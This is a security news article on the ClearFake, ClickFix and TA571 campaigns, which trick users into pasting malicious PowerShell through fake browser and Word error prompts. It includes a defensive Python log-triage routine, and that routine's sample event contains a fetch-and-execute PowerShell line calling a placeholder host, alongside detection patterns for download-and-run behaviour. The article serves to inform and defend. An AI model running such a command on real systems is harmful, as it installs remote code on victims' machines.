This campaign involves several threat clusters, including ClearFake, ClickFix and TA571. ClearFake has previously used fake browser-update prompts on compromised websites, where the "update" actually installs malware.
In the latest attacks, the criminals use JavaScript in email attachments or on compromised websites to display fake error messages that appear to come from Google Chrome, Word or OneDrive. The messages tell users to click a button that copies a PowerShell "fix" to their clipboard, and then to run that script in PowerShell.
Although these attacks require the user to take several steps, the social engineering is convincing enough to make people believe there is a real problem that needs fixing, which may push them to act quickly without considering the risk, according to a report from Proofpoint.
The malware Proofpoint observed includes DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker and Lumma Stealer.
Proofpoint researchers saw three attack chains, each with a different starting point. Only the first is not clearly attributed to TA571. In that chain, attributed to ClearFake, users visit a compromised website that loads a malicious script hosted on the blockchain through Binance's Smart Chain contracts.
The script runs some checks and then displays a fake Google Chrome warning saying the page could not be displayed. The message asks the visitor to install a "root certificate" by copying a PowerShell script to the Windows clipboard and running it in an elevated (administrator) PowerShell.
When the PowerShell script is executed, it performs various steps to confirm the device is a valid target, and then downloads additional payloads, as outlined below.
· Flushes the DNS cache.
· Removes clipboard content.
· Displays a decoy message.
· Downloads another remote PowerShell script, which performs anti-VM checks before downloading an info-stealer.
The 'ClearFake' attack chain (Source: Proofpoint)
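As an added illustration of what a defender can look for (example code written for this page, not from Proofpoint's report): a small Python triage routine that scans PowerShell script-block log entries for the combination of behaviours described above, a DNS flush, a clipboard wipe, a decoy message, and a remote download executed in memory. The event records, their field names and the URL in them are constructed assumptions, not captured data.

```python
import re

# Constructed sample records in the shape of PowerShell Script Block Logging
# (Event ID 4104) entries. They are illustrative only; the hostname uses the
# reserved .invalid TLD so it can never resolve.
SAMPLE_EVENTS = [
    {"id": 101, "user": "alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": 102, "user": "bob",
     "script": ("ipconfig /flushdns; Set-Clipboard -Value ''; "
                "Write-Host 'Fix applied, please wait...'; "
                "Invoke-Expression (Invoke-WebRequest -Uri "
                "'http://example.invalid/update.ps1' -UseBasicParsing).Content")},
    {"id": 103, "user": "carol", "script": "Clear-DnsClientCache"},
]

# One regex per behaviour the article attributes to the pasted script.
# Each is weak on its own (admins flush DNS too); the combination is the signal.
INDICATORS = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_wipe": re.compile(
        r"Set-Clipboard|\[System\.Windows\.Forms\.Clipboard\]::Clear", re.I),
    "decoy_message": re.compile(
        r"Write-Host|\[System\.Windows\.MessageBox\]::Show", re.I),
    "remote_fetch": re.compile(
        r"Invoke-WebRequest|DownloadString|Net\.WebClient|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
}


def score_event(script):
    """Return the set of indicator names found in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}


def is_clickfix_like(hits):
    """Flag only when a remote fetch is piped into in-memory execution AND at
    least one of the cleanup/decoy behaviours is present, so a lone DNS flush
    or a lone Write-Host never trips the rule."""
    chain = {"remote_fetch", "in_memory_exec"} <= hits
    side = hits & {"dns_flush", "clipboard_wipe", "decoy_message"}
    return chain and bool(side)


def triage(events):
    """Map each flagged event id to the sorted list of indicators it matched."""
    return {e["id"]: sorted(score_event(e["script"]))
            for e in events if is_clickfix_like(score_event(e["script"]))}
```

Only event 102 is flagged; the benign directory listing and the lone cache flush pass through, which is the point of requiring the download-and-execute pair alongside a side behaviour.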
The second chain is linked to the 'ClickFix' campaign. The attackers modify compromised websites to inject an iframe that displays a fake Google Chrome error message.
Visitors are told to open "Windows PowerShell (Admin)" and paste in the supplied code, which leads to the same malware as above.
The third chain is email-based: HTML attachments disguised as Microsoft Word documents ask users to install the "Word Online" extension to view the document correctly.
The error message offers options such as "How to fix" and "Auto-fix". Choosing "How to fix" copies a PowerShell command to the clipboard and tells the user to paste it into PowerShell.
"Auto-fix" uses the search-ms protocol handler to display a file hosted on an attacker-controlled remote server, named for example "fix.msi" or "fix.vbs".
In these cases, the PowerShell commands download and run either an MSI file or a VBS script, resulting in Matanbuchus or DarkGate infections.
In every chain, the attackers count on users not realizing the risk of running PowerShell commands on their computers.
They also rely on Windows not always detecting and blocking the malicious actions launched by the pasted code.
These varied attack chains show that TA571 is actively testing different methods to improve its effectiveness and find more ways to infect more computers.